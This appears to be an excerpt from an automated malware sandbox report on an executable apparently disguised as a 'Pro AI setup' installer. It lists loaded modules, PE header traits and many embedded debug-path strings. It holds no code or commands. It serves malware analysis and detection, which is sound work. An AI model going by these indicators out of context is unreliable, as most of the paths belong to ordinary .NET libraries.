Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: mDHwap5GlV.exe Static PE information: certificate valid
Source: mDHwap5GlV.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: mDHwap5GlV.exe Static file information: File size 62920824 > 1048576
Source: mDHwap5GlV.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x520400
Source: mDHwap5GlV.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x138a00
Source: mDHwap5GlV.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x14f600
Source: mDHwap5GlV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: mDHwap5GlV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: mDHwap5GlV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: mDHwap5GlV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: mDHwap5GlV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: mDHwap5GlV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: mDHwap5GlV.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: mDHwap5GlV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq.Expressions\Release\net7.0\System.Linq.Expressions.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586676294.000000000A3E1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2610536524.000000000E271000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net7.0\System.Linq.pdbSHA256#0$B source: mDHwap5GlV.exe, 00000000.00000002.2587665887.000000000A930000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2587777590.000000000A9B1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net7.0\System.Net.ServicePoint.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net7.0-windows\System.Net.NameResolution.pdbSHA256A source: mDHwap5GlV.exe, 00000000.00000002.2612038536.000000000E351000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2611890775.000000000E320000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: wntdll.pdb source: decrypted_app_1.exe, 00000007.00000002.3101125278.00000000030E0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.VisualBasic/Release/net7.0-windows/Microsoft.VisualBasic.pdbSHA2565 source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Quic\Release\net7.0-windows\System.Net.Quic.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net7.0\System.Collections.Concurrent.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: System.Net.Security.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593612711.000000000C991000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593507496.000000000C900000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net7.0-windows/System.Management.pdb source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.VisualBasic/Release/net7.0-windows/Microsoft.VisualBasic.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net7.0\System.Diagnostics.DiagnosticSource.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdba source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.CodeDom/Release/net7.0/System.CodeDom.pdb source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Buffers\Release\net7.0\System.Buffers.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x86\Release\System.Private.CoreLib.pdb source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\DayDerry\Pro_AI_setup_v_1.03\obj\Release\net7.0\win-x86\Pro_AI_setup_v_1.03.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\dlls\mscordac\mscordaccore.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Linq.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2587665887.000000000A930000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2587777590.000000000A9B1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices.RuntimeInformation\Release\net7.0\System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net7.0\System.Memory.pdbSHA256oY source: mDHwap5GlV.exe, 00000000.00000002.2604929693.000000000D481000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604788493.000000000D440000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Immutable\Release\net7.0\System.Collections.Immutable.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Collections.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2605844050.000000000D521000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2605777963.000000000D4D0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net7.0\System.Threading.Thread.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2609058208.000000000DEE0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb>i source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net7.0-windows\System.Diagnostics.Process.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607643100.000000000DDB0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607711334.000000000DE01000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2620268309.000000000E7F0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2620375104.000000000E811000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Data/Release/net7.0-windows/System.Data.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Contracts\Release\net7.0\System.Diagnostics.Contracts.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Timer\Release\net7.0\System.Threading.Timer.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net7.0\System.Collections.pdb source: mDHwap5GlV.exe, 00000000.00000002.2605844050.000000000D521000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2605777963.000000000D4D0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Data/Release/net7.0-windows/System.Data.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO\Release\net7.0\System.IO.pdb source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO\Release\net7.0\System.IO.pdbSHA256w source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Configuration/Release/net7.0-windows/System.Configuration.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: wntdll.pdbUGP source: decrypted_app_1.exe, 00000007.00000002.3101125278.00000000030E0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Debug\Release\net7.0\System.Diagnostics.Debug.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net7.0\System.Threading.Overlapped.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2611810679.000000000E300000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.UnmanagedMemoryStream\Release\net7.0\System.IO.UnmanagedMemoryStream.pdb source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Collections.Immutable.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: C:\Users\Administrator\Desktop\DayDerry\Pro_AI_setup_v_1.03\obj\Release\net7.0\win-x86\Pro_AI_setup_v_1.03.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Net.NameResolution.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2612038536.000000000E351000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2611890775.000000000E320000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net7.0\System.Collections.Specialized.pdb source: mDHwap5GlV.exe, 00000000.00000002.2620268309.000000000E7F0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2620375104.000000000E811000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net7.0\System.Runtime.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2582770722.0000000009AB0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.VisualBasic.Core\Release\net7.0-windows\Microsoft.VisualBasic.Core.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Quic\Release\net7.0-windows\System.Net.Quic.pdbSHA256: source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net7.0\System.Diagnostics.Tracing.pdb source: mDHwap5GlV.exe, 00000000.00000002.2592357978.000000000C7E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net7.0\System.Runtime.InteropServices.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604677499.000000000D431000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb[ source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Quic.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net7.0\System.Threading.pdb source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595974127.000000000D041000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Timer\Release\net7.0\System.Threading.Timer.pdb source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Threading.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595974127.000000000D041000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.AppContext\Release\net7.0\System.AppContext.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: System.Net.ServicePoint.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.CSharp\Release\net7.0-windows\Microsoft.CSharp.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.Primitives\Release\net7.0\System.Security.Cryptography.Primitives.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net7.0\System.Collections.Concurrent.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.Primitives\Release\net7.0\System.Security.Cryptography.Primitives.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net7.0\System.Memory.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604929693.000000000D481000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604788493.000000000D440000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net7.0-windows\System.Net.NameResolution.pdb source: mDHwap5GlV.exe, 00000000.00000002.2612038536.000000000E351000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2611890775.000000000E320000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net7.0\System.Diagnostics.Tracing.pdbSHA256q source: mDHwap5GlV.exe, 00000000.00000002.2592357978.000000000C7E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net7.0-windows\System.Security.Cryptography.pdb source: mDHwap5GlV.exe, 00000000.00000002.2594220011.000000000CBE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: Microsoft.CSharp.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Collections.ni.pdb; lr source: mDHwap5GlV.exe, 00000000.00000002.2605844050.000000000D521000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2605777963.000000000D4D0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net7.0\System.Runtime.pdb source: mDHwap5GlV.exe, 00000000.00000002.2582770722.0000000009AB0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Sockets.ni.pdbp source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2610536524.000000000E271000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607643100.000000000DDB0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607711334.000000000DE01000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net7.0-windows\System.Console.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583359508.0000000009AD1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2594641559.000000000CDAA000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2594814056.000000000CDF1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.AppContext\Release\net7.0\System.AppContext.pdb source: mDHwap5GlV.exe
Source: Binary string: Microsoft.VisualBasic.Core.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net7.0\System.Diagnostics.DiagnosticSource.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net7.0\System.Threading.ThreadPool.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net7.0\Microsoft.Win32.Primitives.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net7.0-windows\System.Net.Security.pdbSHA256S source: mDHwap5GlV.exe, 00000000.00000002.2593612711.000000000C991000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593507496.000000000C900000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net7.0\System.Private.Uri.pdb source: mDHwap5GlV.exe, 00000000.00000002.2594641559.000000000CDAA000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2594814056.000000000CDF1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Linq.Expressions.ni.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586676294.000000000A3E1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net7.0-windows\System.Net.Sockets.pdb source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2610536524.000000000E271000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.UnmanagedMemoryStream\Release\net7.0\System.IO.UnmanagedMemoryStream.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Configuration/Release/net7.0-windows/System.Configuration.pdb source: mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net7.0-windows\System.Net.Security.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593612711.000000000C991000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593507496.000000000C900000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Memory.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604929693.000000000D481000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604788493.000000000D440000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Quic.ni.pdb,3 source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net7.0\System.Text.Encoding.Extensions.pdb source: mDHwap5GlV.exe, 00000000.00000002.2608346084.000000000DE60000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net7.0\System.Threading.Overlapped.pdb source: mDHwap5GlV.exe, 00000000.00000002.2611810679.000000000E300000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\Corehost.Static\singlefilehost.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Security.Cryptography.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2594220011.000000000CBE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Contracts\Release\net7.0\System.Diagnostics.Contracts.pdbSHA256_O source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb]:K source: mDHwap5GlV.exe, 00000000.00000002.2607643100.000000000DDB0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607711334.000000000DE01000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net7.0-windows\System.Net.Primitives.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2583501518.0000000009B20000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583583075.0000000009B61000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices.RuntimeInformation\Release\net7.0\System.Runtime.InteropServices.RuntimeInformation.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\Release\net7.0\System.Security.Cryptography.X509Certificates.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604677499.000000000D431000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\Release\net7.0\System.Security.Cryptography.X509Certificates.pdbSHA256B source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net7.0\System.Net.ServicePoint.pdb source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net7.0-windows\System.Net.Primitives.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2583501518.0000000009B20000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583583075.0000000009B61000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net7.0\System.Linq.pdb source: mDHwap5GlV.exe, 00000000.00000002.2587665887.000000000A930000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2587777590.000000000A9B1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net7.0-windows\Microsoft.Win32.Registry.pdb source: mDHwap5GlV.exe
